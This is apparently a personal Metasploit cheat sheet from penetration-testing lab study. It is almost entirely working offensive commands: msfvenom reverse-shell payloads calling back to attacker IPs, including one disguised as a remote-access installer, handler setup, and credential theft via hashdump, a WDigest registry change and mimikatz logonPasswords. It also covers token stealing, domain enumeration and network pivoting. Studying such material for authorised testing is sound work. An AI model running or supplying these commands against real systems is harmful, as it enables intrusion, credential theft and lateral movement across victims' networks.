MSF | Notion

DB

//Init DB
msfdb init | reinit
db_status
//Create workspace in DB
workspace
workspace -a OSEP
//Scan network & add to DB
db_nmap -A 10.254.0.0/24
//OR import from exist XLM file
db_import /root/msfu/nmapScan
hosts
services -S 445

//Add all boxes by Service
services -S 445 -R

Using the Database in Metasploit | Offensive Security

Payloads

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.27 LPORT=443 -f aspx -o clevergod_443.aspx
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.27 LPORT=443 -f exe -o clg_443_e.exe -e x64/shikata_ga_nai -c 3
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.27 LPORT=9001 -f exe -o clg_9001.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.49.75 LPORT=9001 -f exe > osc_msf_86.exe
set AUTORUNSCRIPT post/windows/manage/migrate
msfvenom -p windows/meterpreter/reverse_http LHOST=10.10.14.27 LPORT=9001 -f psh-cmd > 8081.cmd
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.49.75 LPORT=9001 -f war > tomcat.war

msfvenom -p windows/adduser USER=clevergod PASS=Hacker123$ -f exe > IperiusRemote.exe

use exploit/multi/handler
set LHOST 10.10.14.27
# msfvenom -l payloads
set payload windows/x64/meterpreter/reverse_https
set LPORT 443
# set exploit/multi/script/web_delivery

set payload windows/x64/meterpreter/reverse_tcp
set LPORT 9001
run -js

#set payload windows/meterpreter/reverse_tcp
#set payload windows/shell_reverse_tcp
set AUTORUNSCRIPT post/windows/manage/migrate

Post Expluatation

use post/multi/manage/shell_to_meterpreter
upload /home/kali/REVERSE/artifact.exe
execute artifact.exe

getuid
sysinfo

hostname && echo %username% && systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
migrate 7894

load incognito
getsystem
list_tokens -u

hashdump
run post/windows/gather/hashdump

shell reg add HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
shutdown -r -t 01

load kiwi
kiwi_cmd "sekurlsa::logonPasswords"

run post/windows/gather/bloodhound
run post/windows/gather/tcpnetstat
run post/windows/gather/enum_domain
run post/windows/gather/enum_domains
run post/windows/gather/enum_domain_group_users
run post/windows/gather/enum_logged_on_users

run post/windows/gather/arp_scanner RHOSTS=10.1.101.0/24

run post/windows/gather/checkvm
run post/windows/gather/credentials/credential_collector
run post/windows/manage/migrate
run post/windows/gather/enum_applications
run post/windows/gather/enum_shares
run post/windows/gather/enum_snmp
run post/windows/gather/hashdump
run post/windows/gather/usb_history

use post/multi/recon/local_exploit_suggester
tasklist /SVC
steal_token 5122

run post/windows/manage/multi_meterpreter_inject PAYLOAD=windows/shell_bind_tcp

DB_Nmap

#nmap
db_nmap -T4 -p- --open --min-rate=3000 -sS -sC -sV -vv 172.16.75.180,183,184,187,188,192,194,197

run post/windows/gather/arp_scanner RHOSTS=172.16.75.0/24

use auxiliary/scanner/portscan/tcp
set RHOSTS 172.16.75.0/24
set THREADS 50
//set PORTS 445
run

Port Scanning | Offensive Security

Pivoting

use post/multi/manage/autoroute
set session 8
set SUBNET 172.16.75.0
set NETMASK /24
run
route
route print

//Autoroute
run autoroute -s 10.129.158.0/24

//Manual adding routes
route add 172.16.75.0 255.255.255.0 3
ip route add 10.129.158.0/24 via 10.129.158.232

route flush

//portfwd add –l 3389 –p 3389 –r 172.16.194.141

Pivoting in Metasploit

Socks

use auxiliary/server/socks_proxy